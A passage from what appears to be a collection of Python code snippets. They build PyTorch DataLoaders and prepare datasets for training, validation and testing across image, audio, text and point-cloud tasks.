test_dataloader", "def val_dataloader(self) -> DataLoader:\n return DataLoader(\n self.valid_dataset,\n batch_size=self.hparams.batch_size,\n shuffle=False,\n num_workers=multiprocessing.cpu_count(),\n )", "def dataloader_msrvtt_train(args, tokenizer):\n\n msrvtt_train_set = MSRVTT_multi_sentence_dataLoader(\n csv_path=args.train_csv,\n json_path=args.data_path,\n features_path=args.features_path,\n max_words=args.max_words,\n feature_framerate=args.feature_framerate,\n tokenizer=tokenizer,\n max_frames=args.max_frames,\n )\n\n train_sampler = torch.utils.data.distributed.DistributedSampler(msrvtt_train_set)\n\n dataloader = DataLoader(\n msrvtt_train_set,\n batch_size=args.batch_size // args.n_gpu,\n num_workers=args.num_thread_reader,\n pin_memory=False,\n shuffle=(train_sampler is None),\n sampler=train_sampler,\n drop_last=True,\n )\n\n return dataloader, len(msrvtt_train_set), train_sampler", "def load_dataloaders(args):\n logger.info(\"Loading dataloaders...\")\n p_path = os.path.join(\"./data/\", \"df_unencoded.pkl\")\n train_path = os.path.join(\"./data/\", \"df_encoded.pkl\")\n if (not os.path.isfile(p_path)) and (not os.path.isfile(train_path)):\n df = get_data(args, load_extracted=False)\n elif os.path.isfile(p_path) and (not os.path.isfile(train_path)):\n df = get_data(args, load_extracted=True)\n elif os.path.isfile(train_path):\n df = load_pickle(\"df_encoded.pkl\")\n \n # Train-Test split\n msk = np.random.rand(len(df)) < args.train_test_ratio\n trainset = df[msk]\n testset = df[~msk]\n \n trainset = text_dataset(trainset, args)\n max_features_length = trainset.max_x_len\n max_seq_len = trainset.max_y_len\n train_length = len(trainset)\n train_loader = DataLoader(trainset, batch_size=args.batch_size, shuffle=True,\\\n num_workers=0, collate_fn=Pad_Sequence(), pin_memory=False)\n \n testset = text_dataset(testset, args)\n test_length = len(testset)\n test_loader = DataLoader(testset, batch_size=args.batch_size, shuffle=True,\\\n num_workers=0, collate_fn=Pad_Sequence(), pin_memory=False)\n return train_loader, train_length, max_features_length, max_seq_len, test_loader, test_length", "def val_dataloader(self) -> data.DataLoader:\n return data.DataLoader(dataset=self.datasets['valid'], batch_size=self.batch_size,\n num_workers=self.num_workers, shuffle=False, pin_memory=False)", "def create_test_dataloader(configs):\n\n test_dataset = KittiDataset(configs, mode='test', lidar_aug=None, hflip_prob=0., num_samples=configs.num_samples)\n test_sampler = None\n if configs.distributed:\n test_sampler = torch.utils.data.distributed.DistributedSampler(test_dataset)\n test_dataloader = DataLoader(test_dataset, batch_size=configs.batch_size, shuffle=False,\n pin_memory=configs.pin_memory, num_workers=configs.num_workers, sampler=test_sampler)\n\n return test_dataloader", "def creates_data_loader():\n dataset_faces = FaceDataset(\n IMG_DIR, transform=transform_train, face=True)\n\n dataset_no_faces = FaceDataset(\n IMG_DIR, transform=transform_train, face=False)\n\n datasets_faces_split = train_val_test(dataset_faces, 0.2, 0.0)\n datasets_no_faces_split = train_val_test(dataset_no_faces, 0.2, 0.0)\n\n datasets = {}\n datasets[\"train\"] = datasets_faces_split[\"train\"] + \\\n datasets_no_faces_split[\"train\"]\n datasets[\"test\"] = datasets_no_faces_split[\"test\"]\n datasets[\"val\"] = datasets_faces_split[\"val\"] + \\\n datasets_no_faces_split[\"val\"]\n\n train_loader = DataLoader(dataset=datasets[\"train\"], batch_size=BATCH_SIZE,\n num_workers=NUM_WORKERS, pin_memory=PIN_MEMORY, shuffle=True, drop_last=False)\n\n val_loader = DataLoader(dataset=datasets[\"val\"], batch_size=BATCH_SIZE,\n num_workers=NUM_WORKERS, pin_memory=PIN_MEMORY, shuffle=True, drop_last=False)\n return train_loader, val_loader", "def get_loader(dataset='train.txt', crop_size=128, image_size=28, batch_size=2, mode='train', num_workers=1): \n transform = [] \n if mode == 'train': \n transform.append(transforms.RandomHorizontalFlip()) \n transform.append(transforms.CenterCrop(crop_size)) \n transform.append(transforms.Resize(image_size)) \n transform.append(transforms.ToTensor()) \n transform.append(transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))) \n transform = transforms.Compose(transform) \n train_data=MyDataset(txt=dataset, transform=transform) \n data_loader = DataLoader(dataset=train_data, \n batch_size=batch_size, \n shuffle=(mode=='train'), \n num_workers=num_workers) \n return data_loader", "def get_loader(data_list, config, train=True):\n \n with open(config[\"label_map\"], \"r\") as f:\n label_map = json.load(f)\n\n dataset = GoogleSpeechDataset(\n data_list=data_list,\n label_map=label_map,\n audio_settings=config[\"hparams\"][\"audio\"],\n aug_settings=config[\"hparams\"][\"augment\"] if train else None,\n cache=config[\"exp\"][\"cache\"]\n )\n\n dataloader = DataLoader(\n dataset,\n batch_size=config[\"hparams\"][\"batch_size\"],\n num_workers=config[\"exp\"][\"n_workers\"],\n pin_memory=config[\"exp\"][\"pin_memory\"],\n shuffle=True if train else False\n )\n\n return dataloader", "def prepare_anndata(anndata, batch_size, shuffle=False):\n # Add shuffling here\n if sparse.issparse(anndata.X):\n data = anndata.X.A\n else:\n data = anndata.X\n data = torch.Tensor(data)\n my_dataloader = torch.utils.data.DataLoader(data, shuffle=shuffle, batch_size=batch_size)\n return my_dataloader", "def fetch_dataloader(types, data_dir, hyper_params, train_idx=None, val_idx=None):\n dataloaders = {}\n \n # TODO: write this to hyper_params, make hyper_params an out variable? then save? yes, AND: when ONLY test is requested, load from hyperparams!\n # TODO: also, add 3rd variation of types: for testing, only read it from hyper_params (DO I NEED TO READ HYPER_PARAMS FOR JUST TESTING?)\n if train_idx is not None:\n mean, std = mean_std_calc(DataLoader(Subset(Heart2DSegmentationDataset(str(Path(data_dir) / \"train_heart_scans\"), hyper_params.endo_or_epi), train_idx)))\n hyper_params.mean = mean.item()\n hyper_params.std = std.item()\n else:\n if 'train' in types:\n mean, std = mean_std_calc(DataLoader(Heart2DSegmentationDataset(str(Path(data_dir) / \"train_heart_scans\"), hyper_params.endo_or_epi)))\n hyper_params.mean = mean.item()\n hyper_params.std = std.item()\n else:\n mean, std = torch.tensor(hyper_params.mean), torch.tensor(hyper_params.std)\n \n print(\"Mean: {}, Std: {}\".format(mean.item(), std.item()))\n # borrowed from http://pytorch.org/tutorials/advanced/neural_style_tutorial.html\n # and http://pytorch.org/tutorials/beginner/data_loading_tutorial.html\n train_transformer = transforms.Compose([\n transforms.Normalize(mean=[mean.item()], std=[std.item()])\n ])\n \n eval_transformer = transforms.Compose([\n transforms.Normalize(mean=[mean.item()], std=[std.item()])\n ])\n\n for split in ['train', 'val', 'test']:\n if split in types:\n path = str(Path(data_dir) / \"{}_heart_scans\".format(split if split != 'val' else 'train'))\n\n if split == 'train':\n if train_idx is not None:\n dl = DataLoader(Subset(Heart2DSegmentationDataset(path, hyper_params.endo_or_epi, train_transformer), train_idx), \n batch_size=hyper_params.batch_size, \n shuffle=True,\n num_workers=hyper_params.num_workers,\n pin_memory=hyper_params.cuda)\n else:\n dl = DataLoader(Heart2DSegmentationDataset(path, hyper_params.endo_or_epi, train_transformer), \n batch_size=hyper_params.batch_size, \n shuffle=True,\n num_workers=hyper_params.num_workers,\n pin_memory=hyper_params.cuda)\n else:\n if (split == 'val') and (val_idx is not None): \n dl = DataLoader(Subset(Heart2DSegmentationDataset(path, hyper_params.endo_or_epi, eval_transformer), val_idx), \n batch_size=hyper_params.batch_size, \n shuffle=False,\n num_workers=hyper_params.num_workers,\n pin_memory=hyper_params.cuda) \n else:\n dl = DataLoader(Heart2DSegmentationDataset(path, hyper_params.endo_or_epi, eval_transformer), \n batch_size=hyper_params.batch_size, \n shuffle=False,\n num_workers=hyper_params.num_workers,\n pin_memory=hyper_params.cuda)\n\n dataloaders[split] = dl\n\n return dataloaders", "def get_dataloader(\n path='data/interim/data.json',\n train_test_split=0.8,\n batch_size_train=5,\n batch_size_test=5,\n shuffle_train=True,\n perm_images=True,\n transform_train=True,\n transform_test=False,\n class_names=None):\n\n # use our dataset and defined transformations\n if class_names is None:\n dataset = ProdigyDataReader(path, get_transforms(train=transform_train))\n dataset_test = ProdigyDataReader(path, get_transforms(train=transform_test))\n else:\n dataset = ProdigyDataReader(path, get_transforms(train=transform_train),\n object_categories=class_names)\n dataset_test = ProdigyDataReader(path, get_transforms(train=transform_test),\n object_categories=class_names)\n\n # split the dataset in train and test set\n if perm_images:\n indices = torch.randperm(len(dataset)).tolist()\n else:\n indices = list(range(len(dataset)))\n\n len_train = int(len(indices) * train_test_split)\n dataset = torch.utils.data.Subset(dataset, indices[:len_train])\n dataset_test = torch.utils.data.Subset(dataset_test, indices[len_train:])\n\n # define training and validation data loaders\n data_loader = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size_train, shuffle=shuffle_train, num_workers=0,\n collate_fn=collate_fn)\n\n data_loader_test = torch.utils.data.DataLoader(\n dataset_test, batch_size=batch_size_test, shuffle=False, num_workers=0,\n collate_fn=collate_fn)\n\n return [data_loader, data_loader_test]", "def get_val_dataloader(dataset, datadir, datasize, val_bs):\n val_dl = None\n if dataset == 'tinyimagenet':\n if not os.path.exists('./data/tiny-imagenet-200'):\n download_and_unzip('http://cs231n.stanford.edu/tiny-imagenet-200.zip','./data/')\n random_ids = np.random.randint(100000, size=datasize)\n val_indices = random_ids\n\n imagenet_mean = [0.485, 0.456, 0.406]\n imagenet_std = [0.229, 0.224, 0.225]\n\n val_dl = torch.utils.data.DataLoader(\n torchvision.datasets.ImageFolder(datadir,\n transform=transforms.Compose([\n transforms.Resize(32), \n transforms.ToTensor(),\n # Phuong 09/26 change (mean, std) -> same as pretrained imagenet\n transforms.Normalize(mean=imagenet_mean, std=imagenet_std)])),\n #Phuong 09/26 drop_last=False -> True\n batch_size=val_bs, drop_last=True, sampler=SubsetRandomSampler(val_indices))\n \n elif dataset == 'fmnist':\n dl_obj = FashionMNIST_truncated\n transform_val = transforms.Compose([\n transforms.ToTensor(),])\n \n random_ids = np.random.randint(10000, size=datasize)\n val_indices = random_ids\n\n val_ds = dl_obj(datadir, dataidxs=val_indices, train=True, transform=transform_val, download=True)\n val_dl = torch.utils.data.DataLoader(dataset=val_ds, batch_size=val_bs, shuffle=True, drop_last=False)\n \n elif dataset == \"cifar10\":\n dl_obj = CIFAR10_truncated\n transform_val = transforms.Compose([\n transforms.ToTensor(),\n transforms.Lambda(lambda x: F.pad(\n Variable(x.unsqueeze(0), requires_grad=False),\n (4, 4, 4, 4), mode='reflect').data.squeeze()),\n transforms.ToPILImage(),\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n # Phuong 09/26 change (mean, std) -> same as pretrained imagenet\n transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n # transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n\n ])\n random_ids = np.random.randint(10000, size=datasize)\n val_indices = random_ids\n\n val_ds = dl_obj(datadir, dataidxs=val_indices, train=True, transform=transform_val, download=True)\n val_dl = torch.utils.data.DataLoader(dataset=val_ds, batch_size=val_bs, shuffle=True, drop_last=False)\n\n\n return val_dl", "def _load_data(self):\n if self._name in BALANCE_DATASET:\n _loader = dataset_loaders[self._name]\n xnp, y = _loader()\n\n # Train - Test split\n gen = ShuffleSplit(n_splits=1, random_state=42, test_size=self._test_size).split(xnp)\n train_idx, test_idx = next(gen)\n\n # Train data.\n self.xnp_tr = xnp[train_idx]\n self.y_tr = y[train_idx]\n # Test data.\n self.xnp_ts = xnp[test_idx]\n self.y_ts = y[test_idx]\n\n else:\n _loader = dataset_loaders[self._name]\n xnp, xp, y = _loader()\n # self.xnp, self.xp, self.y = _loader()\n\n # Train - Test split\n gen = ShuffleSplit(n_splits=1, random_state=42, test_size=self._test_size).split(xnp)\n train_idx, test_idx = next(gen)\n\n # Train data.\n self.xnp_tr = xnp[train_idx]\n self.xp_tr = xp[train_idx]\n self.y_tr = y[train_idx]\n # Test data.\n self.xnp_ts = xnp[test_idx]\n self.xp_ts = xp[test_idx]\n self.y_ts = y[test_idx]", "def prepare_demo_dataset(path, reso, batch_size=1):\r\n transform = transforms.Compose([\r\n transforms.Resize(size=(reso, reso), interpolation=3),\r\n transforms.ToTensor()\r\n ])\r\n\r\n img_datasets = DemoDataset(path, transform)\r\n dataloader = torch.utils.data.DataLoader(img_datasets, batch_size=batch_size, num_workers=8)\r\n\r\n return img_datasets, dataloader", "def training_start(self, dataloader):\n self.datasize = len(dataloader)", "def get_test_loader(id_list = './data/sample_submission.csv', root_dir = './data/test/'):\n data = HumanProteinDataset(id_list, root_dir, transform = transforms.Compose([\n Rescale((256, 256)), \n ToTensor()\n ]))\n\n indices = np.arange(len(data))\n dataloader_test = DataLoader(data, batch_size=10, num_workers=5)\n\n return dataloader_test", "def train(self, data):\n pass", "def make_data_loader(examples, batch_size=100, shuffle=True):\n x, y = zip(*examples) # makes lists of windows and tags\n x, y = tr.from_numpy(np.array(x)), tr.from_numpy(np.array(y))\n x, y = x.type(tr.LongTensor), y.type(tr.LongTensor) # convert lists to tensors\n train = utdata.TensorDataset(x, y)\n return utdata.DataLoader(train, batch_size, shuffle)", "def create_trainval_dataloaders(params):\n # ----------------Create Dataset objects and Dataloaders----------------\n mr_dataset_train, tokenizer = get_dataset(params, run_mode=\"train\")\n params.vocab_size = tokenizer.get_vocab_size()\n print(\"SystemLog: Vocab size used for training is %d\" % (params.vocab_size))\n print(\"SystemLog: Number of items in the train dataset=%d\" % len(mr_dataset_train))\n sys.stdout.flush()\n # Collate Function pads the sequences to have a uniform length for the entire batch\n mr_dataloader_train = DataLoader(mr_dataset_train, batch_size=params.batch_size,\n shuffle=True, num_workers=params.num_workers, collate_fn=CollateMRSequence(params.architecture))\n\n mr_dataset_valid, _ = get_dataset(params, run_mode=\"valid\")\n print(\"SystemLog: Number of items in the valid dataset=%d\" % len(mr_dataset_valid))\n mr_dataloader_valid = DataLoader(mr_dataset_valid, batch_size=params.batch_size_validation,\n shuffle=False, num_workers=0, collate_fn=CollateMRSequence(params.architecture))\n\n return mr_dataset_train, mr_dataloader_train, mr_dataset_valid, mr_dataloader_valid", "def build_dataloader(cfg, augmentor=None, mode='train', dataset=None, rank=None,\n dataset_class=VolumeDataset, dataset_options={}, cf=collate_fn_train):\n assert mode in ['train', 'val', 'test']\n print('Mode: ', mode)\n\n if mode == 'train':\n batch_size = cfg.SOLVER.SAMPLES_PER_BATCH\n elif mode == 'val':\n batch_size = cfg.SOLVER.SAMPLES_PER_BATCH * 4\n else:\n cf = collate_fn_test # update the collate function\n batch_size = cfg.INFERENCE.SAMPLES_PER_BATCH * cfg.SYSTEM.NUM_GPUS\n\n if dataset is None: # no pre-defined dataset instance\n if cfg.MODEL.TARGET_OPT_MULTISEG_SPLIT is not None:\n dataset_class = VolumeDatasetMultiSeg\n dataset = get_dataset(cfg, augmentor, mode, rank, dataset_class, dataset_options)\n\n sampler = None\n num_workers = cfg.SYSTEM.NUM_CPUS\n if cfg.SYSTEM.DISTRIBUTED:\n num_workers = cfg.SYSTEM.NUM_CPUS // cfg.SYSTEM.NUM_GPUS\n if cfg.DATASET.DISTRIBUTED == False:\n sampler = torch.utils.data.distributed.DistributedSampler(dataset)\n\n # In PyTorch, each worker will create a copy of the Dataset, so if the data\n # is preload the data, the memory usage should increase a lot.\n # https://discuss.pytorch.org/t/define-iterator-on-dataloader-is-very-slow/52238/2\n img_loader = torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, shuffle=False, collate_fn=cf,\n sampler=sampler, num_workers=num_workers, pin_memory=True)\n\n return img_loader", "def dataio_prepare(hparams):\n data_folder = hparams[\"data_folder\"]\n\n train_data = dataset.DynamicItemDataset.from_csv(\n csv_path=hparams[\"train_data\"],\n replacements={\"data_root\": data_folder}, )\n\n if hparams[\"sorting\"] == \"ascending\":\n # we sort training data to speed up training and get better results.\n train_data = train_data.filtered_sorted(sort_key=\"duration\")\n # when sorting do not shuffle in dataloader ! otherwise is pointless\n hparams[\"train_dataloader_opts\"][\"shuffle\"] = False\n\n elif hparams[\"sorting\"] == \"descending\":\n train_data = train_data.filtered_sorted(\n sort_key=\"duration\", reverse=True)\n # when sorting do not shuffle in dataloader ! otherwise is pointless\n hparams[\"train_dataloader_opts\"][\"shuffle\"] = False\n\n elif hparams[\"sorting\"] == \"random\":\n pass\n\n else:\n raise NotImplementedError(\n \"sorting must be random, ascending or descending\")\n\n valid_data = dataset.DynamicItemDataset.from_csv(\n csv_path=hparams[\"valid_data\"],\n replacements={\"data_root\": data_folder}, )\n valid_data = valid_data.filtered_sorted(sort_key=\"duration\")\n\n test_data = dataset.DynamicItemDataset.from_csv(\n csv_path=hparams[\"test_data\"],\n replacements={\"data_root\": data_folder}, )\n test_data = test_data.filtered_sorted(sort_key=\"duration\")\n\n datasets = [train_data, valid_data, test_data]\n\n # Defining tokenizer and loading it\n tokenizer = transformers.BertTokenizer.from_pretrained('bert-base-chinese')\n\n # 2. Define audio pipeline:\n @data_pipeline.takes(\"wav\")\n @data_pipeline.provides(\"sig\")\n def audio_pipeline(wav):\n sig = dataio.read_audio(wav)\n return sig\n\n dataset.add_dynamic_item(datasets, audio_pipeline)\n\n # 3. Define text pipeline:\n @data_pipeline.takes(\"transcript\")\n @data_pipeline.provides(\"wrd\", \"tokens_list\", \"tokens\")\n def text_pipeline(wrd):\n wrd = \"\".join(wrd.split(\" \"))\n yield wrd\n tokens_list = tokenizer(wrd)[\"input_ids\"]\n yield tokens_list\n tokens = numpy.array(tokens_list, dtype=\"int64\")\n yield tokens\n\n dataset.add_dynamic_item(datasets, text_pipeline)\n\n # 4. Set output:\n dataset.set_output_keys(\n datasets,\n [\"id\", \"sig\", \"wrd\", \"tokens\"], )\n\n # 5. If Dynamic Batching is used, we instantiate the needed samplers.\n train_batch_sampler = None\n valid_batch_sampler = None\n if hparams[\"dynamic_batching\"]:\n from sampler import DynamicBatchSampler # noqa\n\n dynamic_hparams = hparams[\"dynamic_batch_sampler\"]\n num_buckets = dynamic_hparams[\"num_buckets\"]\n\n train_batch_sampler = DynamicBatchSampler(\n train_data,\n dynamic_hparams[\"max_batch_len\"],\n num_buckets=num_buckets,\n length_func=lambda x: x[\"duration\"],\n shuffle=dynamic_hparams[\"shuffle_ex\"],\n batch_ordering=dynamic_hparams[\"batch_ordering\"], )\n\n valid_batch_sampler = DynamicBatchSampler(\n valid_data,\n dynamic_hparams[\"max_batch_len\"],\n num_buckets=num_buckets,\n length_func=lambda x: x[\"duration\"],\n shuffle=dynamic_hparams[\"shuffle_ex\"],\n batch_ordering=dynamic_hparams[\"batch_ordering\"], )\n\n return (train_data, valid_data, test_data, tokenizer, train_batch_sampler,\n valid_batch_sampler, )", "def prepare_data(self,d):\n train_loaders, train_iters = {}, {}\n unlabeled_loaders, unlabeled_iters = {}, {}\n for domain in opt.domains:\n #CONVERT TO FLOAT32\n features, target = torch.from_numpy(d[domain].X.todense().astype('float32')), torch.from_numpy(d[domain].y)#.reshape((-1,1))\n train = data_utils.TensorDataset(features,target)\n train_loaders[domain] = DataLoader(train, opt.batch_size, shuffle = True)\n train_iters[domain] = iter(train_loaders[domain])\n for domain in opt.unlabeled_domains:\n features, target = torch.from_numpy(d[domain].X.todense().astype('float32')), torch.from_numpy(d[domain].y)#.reshape(-1,1))\n uset = data_utils.TensorDataset(features,target)\n unlabeled_loaders[domain] = DataLoader(uset,opt.batch_size, shuffle = True)\n unlabeled_iters[domain] = iter(unlabeled_loaders[domain])\n \n return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters", "def test_dataloader(self, batch_size: Optional[int] = None) -> DataLoader:\n if self.test is not None:\n dataset = TabularDataset(\n task=self.config.task,\n data=self.test,\n categorical_cols=self.config.categorical_cols,\n continuous_cols=self.config.continuous_cols,\n embed_categorical=(not self.do_leave_one_out_encoder()),\n target=self.target,\n )\n return DataLoader(\n dataset,\n batch_size if batch_size is not None else self.batch_size,\n shuffle=False,\n num_workers=self.config.num_workers,\n pin_memory=self.config.pin_memory,\n )", "def get_each_loader(data_path, batch_size, trn_negnum, shuffle=True, num_workers=0):\n \n dataset = ML_Dataset(data_path, trn_negnum)\n \n if data_path.endswith('trn') == True:\n collate = dataset.train_collate\n else:\n collate = test_collate\n\n data_loader = data.DataLoader(dataset=dataset,\n batch_size=batch_size,\n shuffle=shuffle,\n num_workers=num_workers,\n collate_fn=collate)\n\n return data_loader", "def __init__(self, **kwargs):\n DataLoader.__init__(self, **kwargs)\n \n self._results_ = None", "def train(self, train_loader):\n pass", "def load_data(self,split='train'):\n raise NotImplementedError", "def get_dataloader(hp: HParams) \\\n -> Tuple[torch.utils.data.DataLoader, torch.utils.data.DataLoader, int]:\n if hp.data.dataset == \"podcast\":\n dataset = podcast.PODCAST(root=hp.data.path,\n audio_folder=hp.data.audio_folder,\n text_file=hp.data.text_file)\n length = len(dataset)\n train_length = int(0.9 * length)\n train_dataset, test_dataset = torch.utils.data.random_split(dataset, [train_length,\n length - train_length])\n\n # https://towardsdatascience.com/7-tips-for-squeezing-maximum-performance-from-pytorch-ca4a40951259\n train_dataloader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=hp.training.batch_size,\n shuffle=False,\n num_workers=hp.training.num_workers,\n collate_fn=collatedata.AudioCollatePodcast(),\n pin_memory=True)\n test_dataloader = torch.utils.data.DataLoader(dataset=test_dataset,\n batch_size=hp.training.batch_size,\n shuffle=False,\n num_workers=hp.training.num_workers,\n collate_fn=collatedata.AudioCollatePodcast(),\n pin_memory=True)\n return train_dataloader, test_dataloader, int(0.9 * length)\n\n elif hp.data.dataset == \"librispeech\":\n Path(hp.data.path).mkdir(parents=True, exist_ok=True)\n dataset = librispeech.download_data(root=hp.data.path, url=hp.data.url)\n length = len(dataset)\n train_length = int(0.9 * length)\n train_dataset, test_dataset = torch.utils.data.random_split(dataset, [train_length,\n length - train_length])\n train_dataloader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=hp.training.batch_size,\n shuffle=False,\n num_workers=hp.training.num_workers,\n collate_fn=collatedata.AudioCollatePodcast(),\n pin_memory=True)\n test_dataloader = torch.utils.data.DataLoader(dataset=test_dataset,\n batch_size=hp.training.batch_size,\n shuffle=False,\n num_workers=hp.training.num_workers,\n collate_fn=collatedata.AudioCollatePodcast(),\n pin_memory=True)\n return train_dataloader, test_dataloader, int(0.9 * length)\n\n elif hp.data.dataset == \"ljspeech\":\n Path(hp.data.path).mkdir(parents=True, exist_ok=True)\n dataset = ljspeech.download_data(root=hp.data.path)\n length = len(dataset)\n train_length = int(0.9 * length)\n train_dataset, test_dataset = torch.utils.data.random_split(dataset, [train_length,\n length - train_length])\n train_dataloader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=hp.training.batch_size,\n shuffle=False,\n num_workers=hp.training.num_workers,\n collate_fn=collatedata.AudioCollatePodcast(),\n pin_memory=True)\n test_dataloader = torch.utils.data.DataLoader(dataset=test_dataset,\n batch_size=hp.training.batch_size,\n shuffle=False,\n num_workers=hp.training.num_workers,\n collate_fn=collatedata.AudioCollatePodcast(),\n pin_memory=True)\n\n return train_dataloader, test_dataloader, int(0.9 * length)\n\n else:\n raise Exception(f\"Dataset {hp.data.dataset} does not exist\")", "def get_dataloader(params, format_name='hdf5', **kwargs):\n \n Provider = get_proper_provider(format_name)(params.modality)\n \n return DataLoader(Provider(params.dataset_path,\n seq_length=params.seq_length),\n batch_size=params.batch_size,\n shuffle=params.is_training,\n num_workers=params.num_workers,\n pin_memory=params.cuda,\n collate_fn=pad_collate)", "def load_data(self,split='train'):\n return load_arrow_data(self.config,split)", "def data_loader(edges,features,y):\n\n\n edge_index = torch.tensor(edges, dtype=torch.long)\n edge_index = edge_index.t().contiguous()\n x = torch.tensor(features.todense(), dtype=torch.float)\n\n y = torch.tensor(y)\n\n data = Data(x=x, edge_index=edge_index, y = y)\n\n return data", "def load_data(data_feeder):\n return data_feeder(BATCH_SIZE,\n SEQ_LEN,\n OVERLAP,\n Q_LEVELS,\n Q_ZERO,\n Q_TYPE)", "def load(self, config, dataset_type, *args, **kwargs):\n base_dataset_name = config.get(\"base_dataset_name\", \"vqa2\")\n base_dataset_config = config.get(\"base_dataset\", config)\n # instantiate base dataset\n # instantiate base dataser builder\n base_dataset_builder_class = registry.get_builder_class(base_dataset_name)\n base_dataset_builder_instance = base_dataset_builder_class()\n # build base dataset instance\n base_dataset_builder_instance.build_dataset(base_dataset_config)\n base_dataset = base_dataset_builder_instance.load_dataset(\n base_dataset_config, dataset_type\n )\n if hasattr(base_dataset_builder_instance, \"update_registry_for_model\"):\n base_dataset_builder_instance.update_registry_for_model(base_dataset_config)\n\n # instantiate vinvl dataset\n vinvl_text_processor = config[\"processors\"][\"text_processor\"]\n with open_dict(base_dataset_config):\n base_dataset_config[\"processors\"][\"text_processor\"] = vinvl_text_processor\n base_dataset_config[\"label_map\"] = config[\"label_map\"]\n\n vinvl_dataset = super().load(base_dataset_config, dataset_type, *args, **kwargs)\n vinvl_dataset.set_base_dataset(base_dataset)\n return vinvl_dataset", "def create_dataloader(datafile, dataset_type, batch_size, mechanism, shuffle=False):\n dataset = MazeDataset(datafile, dataset_type)\n assert dataset.num_actions == mechanism.num_actions\n return torch.utils.data.DataLoader(\n dataset, batch_size=batch_size, shuffle=shuffle, num_workers=0)", "def __init__(self, dataloader):\n self._dataloader = dataloader\n\n self._iterator = iter(self._dataloader)", "def test_cached_dataloader(self):\n\n v = [\"data\", \"target\", \"model_out_sqnet\"]\n\n for data, target in self.train_loader:\n b, c, h, w = data[v[0]].shape\n assert data[v[1]].shape == (b, )\n assert data[v[2]].shape == (b, 100)\n assert data[v[1]].shape == target.shape", "def view(\n self,\n collate_fn: Union[callable, str] = \"batch_of_g_and_y\",\n *args,\n **kwargs\n ):\n # provide default collate function\n if isinstance(collate_fn, str):\n collate_fn = getattr(self, collate_fn)\n\n return torch.utils.data.DataLoader(\n dataset=self,\n collate_fn=collate_fn,\n *args,\n **kwargs,\n )", "def get_test_loader(test_dataset,\n batch_size,\n num_workers=4,\n pin_memory=False):\n data_loader = torchutils.DataLoader(\n test_dataset, batch_size=batch_size, shuffle=True, num_workers=num_workers, pin_memory=pin_memory)\n return data_loader", "def get_loader(file_path, src_word2id, trg_word2id, intent_type=None, intent2index=None, batch_size=1):\n dials = json.load(open(file_path))\n dataset_list = []\n for name in dials.keys():\n val_file = dials[name]\n # build a custom dataset\n dataset = MultiwozSingleDataset(val_file, name, src_word2id, trg_word2id, intent_type, intent2index)\n dataset_list.append(dataset)\n datasets = ConcatDataset(dataset_list)\n # data loader for custome dataset\n data_loader = DataLoader(dataset=datasets,\n batch_size=batch_size,\n shuffle=True,\n num_workers=0,\n collate_fn=collate_fn)\n return data_loader", "def get_dataloader(self, cid, batch_size=None, type=\"train\"):\n dataset = self.get_dataset(cid, type)\n batch_size = len(dataset) if batch_size is None else batch_size\n data_loader = DataLoader(dataset, batch_size=batch_size)\n return data_loader", "def dataloader_vatexEnglish_test(args, tokenizer, subset=\"test\"):\n\n vatexEnglish_dataset = VATEXENGLISH_multi_sentence_dataLoader(\n subset=subset,\n data_path=args.data_path,\n features_path=args.features_path,\n max_words=args.max_words,\n feature_framerate=args.feature_framerate,\n tokenizer=tokenizer,\n max_frames=args.max_frames,\n )\n\n dataloader = DataLoader(\n vatexEnglish_dataset,\n batch_size=args.batch_size_val,\n num_workers=args.num_thread_reader,\n shuffle=False,\n drop_last=False,\n )\n return dataloader, len(vatexEnglish_dataset)", "def load(self, handler, name, size, \n batch_size=None, shuffle=False, \n sample_transform=None, batch_transform=None):\n if sample_transform is None:\n sample_transform = self.sample_transform\n if batch_transform is None:\n batch_transform = self.batch_transform\n dataset = DatasetIterator(name, size, handler, \n shuffle=shuffle,\n transform=sample_transform)\n if batch_size is None:\n return dataset\n batches = BatchIterator(dataset, \n batch_size=batch_size, \n transform=batch_transform)\n return batches", "def get_dataloader(\n trainset: VisionDataset,\n testset: VisionDataset,\n batch_size: int,\n n_workers: int,\n) -> Tuple[data.DataLoader, data.DataLoader]:\n trainloader = data.DataLoader(\n trainset,\n pin_memory=(torch.cuda.is_available()),\n num_workers=n_workers,\n shuffle=True,\n batch_size=batch_size,\n )\n testloader = data.DataLoader(\n testset,\n pin_memory=(torch.cuda.is_available()),\n num_workers=n_workers,\n shuffle=False,\n batch_size=batch_size,\n )\n return trainloader, testloader", "def build_dataset(input_reader_config,\n model_config,\n training,\n voxel_generator,\n target_assigner=None):\n generate_bev = model_config.POST_PROCESSING.use_bev\n without_reflectivity = model_config.WITHOUT_REFLECTIVITY\n num_point_features = model_config.NUM_POINT_FEATURES\n out_size_factor = model_config.BACKBONE.layer_strides[0] //model_config.BACKBONE.upsample_strides[0]\n cfg = input_reader_config\n db_sampler_cfg = input_reader_config.DATABASE_SAMPLER\n db_sampler = None\n if len(db_sampler_cfg.sample_groups) > 0:\n db_sampler = build_dbsampler(db_sampler_cfg)\n try:\n u_db_sampler_cfg = input_reader_config.UNLABELED_DATABASE_SAMPLER\n u_db_sampler = None \n if len(u_db_sampler_cfg.sample_groups) > 0:\n u_db_sampler = build_dbsampler(u_db_sampler_cfg)\n except:\n u_db_sampler = None\n grid_size = voxel_generator.grid_size #[352,400]\n feature_map_size = grid_size[:2] // out_size_factor\n feature_map_size = [*feature_map_size, 1][::-1]\n\n prep_func = partial(\n prep_pointcloud,\n root_path = cfg.KITTI_ROOT_PATH,\n class_names = cfg.CLASS_NAMES,\n voxel_generator=voxel_generator,\n target_assigner=target_assigner,\n training=training,\n max_voxels = cfg.MAX_NUMBER_OF_VOXELS,\n remove_outside_points = False,\n create_targets = training,\n shuffle_points = cfg.SHUFFLE_POINTS,\n gt_rotation_noise = cfg.GROUNDTRUTH_ROTATION_UNIFORM_NOISE,\n gt_loc_noise_std = cfg.GROUNDTRUTH_LOCALIZATION_NOISE_STD,\n 